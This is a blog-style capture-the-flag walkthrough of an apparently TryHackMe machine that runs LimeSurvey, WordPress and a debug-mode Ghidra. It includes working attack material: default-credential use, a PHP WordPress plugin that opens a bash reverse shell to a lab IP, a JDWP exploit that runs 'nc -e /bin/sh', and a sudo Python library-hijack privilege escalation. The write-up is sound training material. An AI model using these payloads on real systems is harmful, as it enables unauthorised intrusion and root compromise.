Introduction

lucrecia has installed multiple web applications on the server.

Okay, good to know. This one is Medium rated. Let’s begin.

Ports

Nmap says we’ve got these ports:

  • 21/tcp open ftp
  • 80/tcp open http
  • 443/tcp open https
  • 18002/tcp open unknown
  • 35767/tcp open unknown
  • 38959/tcp open unknown

A more detailed scan reveals Port 18002 is for Java RMI and 38959 appears associated; it’s still not clear what 35767 is. The scan suggests anonymous access may be available for the FTP server, so let’s try that.

FTP

And no dice. Moving on…

Webserver

Oftentimes port 80 will be the HTTP version of a site and 443 will be the HTTPS version, but in this case we’ve got two different webapps. On port 80 we’ve got LimeSurvey, and on 443 we’ve got Wordpress.

Running wpscan on the Wordpress site we find a user called Anny, but nothing else immediately useful.

LimeSurvey

Wikipedia says LimeSurvey is: …a free and open source on-line statistical survey web app written in PHP based on a MySQL, SQLite, PostgreSQL or MSSQL database…

Running searchsploit shows there is an authenticated RCE vulnerability in versions before 3.16, and - spoiler alert - as it turns out we’ve got version 3.15.9. We do need some credentials though.

After doing some enumeration, we find there are lots of pages on this site - I spidered with OWASP ZAP and frankly was scared by the results. However searching for the string Anny didn’t turn anything up. Now what?

Default Credentials

The default credentials for LimeSurvey are admin:password. Can’t be that easy can it? Yes, yes it can. The exploit is for CVE-2018-17057 and there is a python version in ExploitDB; it works like a charm. With this, we get a shell as www-data and we can read the credentials in application/config/config.php. This gives us a password for Anny.

This shell seems a bit restricted though; we don’t seem to be able to cd to the server root for some reason - we’re stuck in /var/www/html.

Anyway, we’ve got the password for Anny, so let’s forget about this for now and go to Wordpress.

Wordpress

The wordpress site is hiding wp-admin with a plugin, but it’s not hard to find. We log in as Anny using the password we read earlier; now we need to get a shell.

Plugin

Directly editing the PHP code in any of the three existing installed plugins doesn’t seem to work (note only one is active when you boot the box), nor does editing the PHP code in the installed theme (on the 404 page for example). However, we can upload a new plugin as a zip file:

<?php

/**
* Plugin Name: Reverse Shell Plugin  
* Plugin URI:  
* Description: Reverse Shell Plugin  
* Version: 1.0  
* Author: Vince Matteo  
* Author URI: http://www.sevenlayers.com  
*/

exec("/bin/bash -c 'bash -i >& /dev/tcp/10.9.10.123/1234 0>&1'");
?>

This needs to be zipped though:

root@kali:/opt/tryhackme/ghizer# zip rev-plugin.zip ./rev-plugin.php

Once it’s zipped we can add our new plugin via the web interface. We install and activate it and catch the shell with our listener; we’re in.

On the box

Linpeas shows something interesting:

veronica  1734  0.3  9.0 2861276 184240 ?      Sl   01:57   0:13 /usr/lib/jvm/java-11-openjdk-amd64/bin/java -Djava.system.class.loader=ghidra.GhidraClassLoader -Dfile.encoding=UTF8 -Dsun.java2d.pmoffscreen=false -Dsun.java2d.opengl=false -Dsun.java2d.xrender=false -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 -Dghidra.cacerts= -Dcpu.core.limit= -Dcpu.core.override= -Dfont.size.override= -Xdebug -Xnoagent -Djava.compiler=NONE -Dlog4j.configuration=/home/veronica/ghidra_9.0/support/debug.log4j.xml -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=127.0.0.1:18001 -Dcom.sun.management.jmxremote.port=18002 -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false -showversion -cp /home/veronica/ghidra_9.0/support/../Ghidra/Framework/Utility/lib/Utility.jar ghidra.GhidraLauncher ghidra.GhidraRun

What does all this mean? Well, it looks like user Veronica is running Ghidra with debug mode turned on. Why is this important? Ghidra runs in Java and the Java Debug Wire Protocol is hackable.

The blog post I linked has some exploit code, but we need to copy it to the box. I made a local copy on my Kali machine and uploaded it to /dev/shm in the same way I would for linpeas; with the python simple server and wget.

Does it work?

www-data@ubuntu:/dev/shm$ python ./jdwp-shellifier.py -t localhost -p 18001 --cmd "nc -e /bin/sh 10.9.10.123 1235"
d "nc -e /bin/sh 10.9.10.123 1235"alhost -p 18001 --cm 
[+] Targeting 'localhost:18001'
[+] Reading settings for 'OpenJDK 64-Bit Server VM - 11.0.5'
[+] Found Runtime class: id=1f3c
[+] Found Runtime.getRuntime(): id=7fbec8032d08
[+] Created break event id=2
[+] Waiting for an event on 'java.net.ServerSocket.accept'
[+] Received matching event from thread 0x1fe3
[+] Selected payload 'nc -e /bin/sh 10.9.10.123 1235'
[+] Command string object created id:1fe4
[+] Runtime.getRuntime() returned context id:0x1fe5
[+] found Runtime.exec(): id=7fbec8032d40
[+] Runtime.exec() successful, retId=1fe6
[!] Command successfully executed

Yes it does, but with one trick. Initially it hangs on:

Waiting for an event on ‘java.net.ServerSocket.accept’

We could try a different Java method as the trigger (with the switch –break-on), but remember our earlier connection with the LimeSurvey exploit? If we do this:

$ telnet 127.0.0.1 18002
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.

Then we get our event on our java.net.ServerSocket.accept and our jdwp exploit completes. Note I had to try a few different reverse shells to get one that worked; the PHP one I used earlier didn’t seem to like this.

Veronica

Now we’re the user veronica. What can she do?

User veronica may run the following commands on ubuntu:
    (ALL : ALL) ALL
    (root : root) NOPASSWD: /usr/bin/python3.5 /home/veronica/base.py

Right, so what is that file?

veronica@ubuntu:~$ cat base.py
cat base.py
import base64

hijackme = base64.b64encode(b'tryhackme is the best')
print(hijackme)

Privesc

Looks like this one has been made simple for us. We just need our own base64.py file:

veronica@ubuntu:~$ echo 'import os;os.system("/bin/bash")' > base64.py
echo 'import os;os.system("/bin/bash")' > base64.py
veronica@ubuntu:~$ sudo -u root /usr/bin/python3.5 /home/veronica/base.py
sudo -u root /usr/bin/python3.5 /home/veronica/base.py
root@ubuntu:~# cd /root  
root@ubuntu:/root# cat root.txt
cat root.txt
FLAG_GOES_HERE

Oh yeah, that’s the stuff.

Footnote

It was good to get this one done. I’m currently roadblocked on The Blob Blog. I know what to do to get it done, but for some reason - me being a dumbass probably - I haven’t been able to get a certain binary to unlock the door for me.